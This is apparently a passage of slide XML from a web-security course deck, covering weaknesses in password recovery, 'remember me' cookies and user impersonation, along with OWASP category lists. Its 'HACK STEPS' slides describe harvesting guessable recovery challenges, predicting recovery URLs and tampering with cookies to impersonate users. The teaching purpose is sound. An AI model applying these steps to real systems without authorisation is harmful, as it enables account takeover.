            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="73FA79"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4471489" y="3796911"/>
            <a:ext cx="2877953" cy="2170118"/>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603" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356634" y="5397112"/>
            <a:ext cx="3062665" cy="171309"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF7E79"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375665" y="5068470"/>
            <a:ext cx="3063780" cy="442465"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF7E79"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pP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3" name="Forgotten Password Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="859536">
              <a:defRPr sz="5076"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Forgotten Password Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1454" name="image8.png" descr="image8.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059093" y="3467946"/>
            <a:ext cx="8968292" cy="4768428"/>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6" name="Forgotten Password Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="859536">
              <a:defRPr sz="5076"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Forgotten Password Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1457" name="Users are inclined to set extremely insecure challenges, presumably on the false assumption that only they will ever be presented with them, for example: “Do I own a boat?”…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Users are inclined to set extremely insecure challenges, presumably on the false assumption that only they will ever be presented with them, for example: “Do I own a boat?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If an application allows unrestricted attempts to answer password recovery challenges, then it is highly likely to be compromised by a determined attacker.</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9" name="Forgotten Password Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="859536">
              <a:defRPr sz="5076"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Forgotten Password Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1460" name="In some applications, the recovery challenge is replaced with a simple password “hint” that is configurable by users during registration. Users commonly set extremely obvious hints, even one that is identical to the password itself, on the false assumption that only they will ever see them."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>In some applications, the recovery challenge is replaced with a simple password “hint” that is configurable by users during registration. Users commonly set extremely obvious hints, even one that is identical to the password itself, on the false assumption that only they will ever see them.</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2" name="Forgotten Password Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="859536">
              <a:defRPr sz="5076"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Forgotten Password Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1463" name="How to combat these vulnerabilities:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>How to combat these vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>One reasonably secure means of implementing this is to send a unique, unguessable, time-limited recovery URL to the email address that the user provided during registration. Visiting this URL within a few minutes enables the user to set a new password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>But there are vulnerabilities to this method also, as attackers can be disclosed the password after successful login or disclosing the email used to the attacker. </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5" name="Forgotten Password Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="859536">
              <a:defRPr sz="5076"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Forgotten Password Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1466" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014052"/>
            <a:ext cx="8812666" cy="5439067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Identify any forgotten password functionality within the application. If this is not explicitly linked from published content, it may still be implemented.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Understand how the forgotten password function works by doing a complete walk-through.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If the mechanism uses a challenge, determine whether users are able to set or select their own challenge and response. If so, use a list of enumerated or common usernames to harvest a list of challenges, and review this for any that appear easily guessable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If the mechanism uses a password “hint,” do the same exercise to harvest a list of password hints, and target any that are easily guessable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Try to identify any behavior in the forgotten password mechanism that can be exploited as the basis for username enumeration or brute-force attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If the application generates an email containing a recovery URL in response to a forgotten password request, obtain a number of these URLs, and attempt to identify any patterns that may enable you to predict the URLs issued to other users. Employ the same techniques as are relevant to analyzing session tokens for predictability.</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8" name="“Remember Me” Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Remember Me” Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469" name="Applications often implement “remember me” functions as a convenience to users, to prevent them needing to reenter their username and password each time.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Applications often implement “remember me” functions as a convenience to users, to prevent them needing to reenter their username and password each time. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This function is often insecure by design and leaves the user exposed to attack both locally and by users on </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>other </a:t>
            </a:r>
            <a:r>
              <a:t>computers.</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1" name="“Remember Me” Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Remember Me” Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1472" name="“Remember Me” function generally uses a cookie. When this cookie is submitted to the initial application page, the application trusts the cookie to authenticate the user, and creates an application session for that person, bypassing the login."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Remember Me” function generally uses a cookie. When this cookie is submitted to the initial application page, the application trusts the cookie to authenticate the user, and creates an application session for that person, bypassing the login.</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4" name="“Remember Me” Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Remember Me” Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1475" name="image9.png" descr="image9.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2275839" y="2817706"/>
            <a:ext cx="8669868" cy="5597537"/>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7" name="“Remember Me” Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Remember Me” Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1478" name="Even if the information stored in a cookie for re-identifying users is suitably protected (e.g., encrypted) to prevent other users from determining or guessing it, the information may still be vulnerable to capture through a bug such as cross-site scripting"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Even if the information stored in a cookie for re-identifying users is suitably protected (e.g., encrypted) to prevent other users from determining or guessing it, the information may still be vulnerable to capture through a bug such as cross-site scripting</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0" name="“Remember Me” Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Remember Me” Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1481" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Activate any “remember me” functionality, and determine whether the functionality indeed does fully “remember” the user or whether it only remembers their username and still requires them to enter a password on subsequent visits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Closely inspect all persistent cookies that are set. Look for any saved data that identifies the user explicitly or appears to contain some predictable identifier of the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Even where data stored appears to be heavily encoded or obfuscated, review this closely and compare the results of “remembering” several very similar usernames and/or passwords to identify any opportunities for reverse engineering the original data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Attempt to modify the contents of the persistent cookie to try and convince the application that another user has saved his details on your computer.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6" name="A1:2017 - Injection…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95409" y="1270000"/>
            <a:ext cx="7221635" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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A1:2017 - Injection</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A2:2017 - Broken Authentication</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A3:2017 - Sensitive Data Exposure</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A4:2017 - XML External Entities (XXE)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A5:2017 - Broken Access Control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A6:2017 - Security Misconfiguration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A7:2017 - Cross-Site Scripting (XSS)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A8:2017 - Insecure Deserialization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A9:2017 - Using Components with Known Vulnerabilities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A10:2017 - Insufficient Logging &amp; Monitoring</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="M1: 2016 - Improper Platform Usage…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386110" y="1270000"/>
            <a:ext cx="5364712" cy="67127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M1: 2016 - Improper Platform Usage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M2: 2016 - Insecure Data Storage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M3: 2016 - Insecure Communication</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M4: 2016 - Insecure Authentication</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M5: 2016 - Insufficient Cryptography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M6: 2016 - Insecure Authorization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M7: 2016 - Client Code Quality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M8: 2016 - Code Tampering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M9: 2016 - Reverse Engineering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M10: 2016 - Extraneous Functionality </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Tampering"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874171" y="1414953"/>
            <a:ext cx="227365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Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2473085" y="2927599"/>
            <a:ext cx="4972286" cy="2620180"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF7E79"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356634" y="5397112"/>
            <a:ext cx="3062665" cy="171309"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF7E79"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375665" y="5068470"/>
            <a:ext cx="3063780" cy="442465"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF7E79"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4162291" y="4198982"/>
            <a:ext cx="3049032" cy="1356732"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF7E79"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pP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3" name="User Impersonation Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="868680">
              <a:defRPr sz="5130"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User Impersonation Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1484" name="Some applications allow privileged users of the application to impersonate other users, in order to access data and carry out actions within their user context.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:t>Some applications allow privileged users of the application to impersonate other users, in order to access data and carry out actions within their user context. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Some banking applications allow helpdesk operators to verbally authenticate a telephone user and then switch their application session into that user’s context in order to assist them. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
